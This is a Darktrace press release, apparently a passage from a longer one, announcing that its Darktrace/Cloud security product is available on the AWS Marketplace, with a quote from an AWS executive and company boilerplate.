The new Darktrace/Cloud solution is now available on Amazon Web Services (AWS) through the AWS Marketplace, a curated digital catalog that makes it easy for customers to find, buy, deploy, and manage the third-party software they need to build solutions and run their business. Darktrace and AWS have been collaborating since 2017 to help organizations secure their AWS environments. Darktrace protects AWS environments for organizations around the world including Sunwest Bank and ProPhase Labs. Darktrace is an AWS Security Competency Partner and is part of the AWS ISV Accelerate program.

"Security is job zero at AWS," said Paddy Fitzpatrick, Director – Independent Software Vendors, UK & Ireland at Amazon Web Services. "As the threat landscape continues to evolve, the availability of AI-based tools like Darktrace/Cloud on the AWS Marketplace will help customers to gain increased visibility, and respond more effectively to security risks and threats."

Darktrace first extended its Cyber AI capabilities to cloud environments in 2016, applying its world class algorithms to granular network traffic. Darktrace/Cloud was recently named Cloud Security Product of the Year for Large Enterprises by Computing Magazine in its 2023 Cloud Excellence Awards.

Learn more about the new enhancements to Darktrace/Cloud by tuning into the launch event at 11:30am ET/4:30pm BST.

**ABOUT DARKTRACE**

Darktrace (DARK.L), a global leader in cyber security artificial intelligence, is on a mission to free the world of cyber disruption. Breakthrough innovations in our Cyber AI Research Center in Cambridge, UK have resulted in over 160 patents filed and research published to contribute to the cyber security community. Rather than study attacks, Darktrace's technology continuously learns and updates its knowledge of 'you' and applies that understanding to optimize your state of optimal cyber security. Darktrace is delivering the first ever Cyber AI Loop, fueling a continuous end-to-end security capability that can autonomously spot and respond to novel in-progress threats within seconds. Darktrace employs over 2,200 people around the world and protects approximately 8,900 customers globally from advanced cyber threats. Darktrace was named one of TIME magazine's 'Most Influential Companies' in 2021. To learn more, visit http://www.darktrace.com.

SOURCE Darktrace

Tag

#web